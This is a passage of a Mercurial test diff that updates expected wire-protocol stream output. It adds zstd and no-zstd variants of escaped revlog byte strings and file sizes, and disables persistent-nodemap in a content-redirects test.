\x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) 
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] @@ -78,14 +81,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 584 + b'totalsize': 584 (no-zstd !) + b'totalsize': 588 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) + b'size': 588 (zstd !) 
}, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + 
b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) 
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'' ] @@ -100,21 +106,26 @@ response: gen[ { b'filecount': 2, - b'totalsize': 1111 + b'totalsize': 1111 (no-zstd !) + b'totalsize': 1118 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) 
+ b'size': 588 (zstd !) }, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + 
b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) 
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'', { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) 
}, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 
1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 
z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] diff --git a/tests/test-wireproto-content-redirects.t b/tests/test-wireproto-content-redirects.t --- a/tests/test-wireproto-content-redirects.t +++ b/tests/test-wireproto-content-redirects.t @@ -1,6 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] @@ -66,9 +70,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2308\r\n + 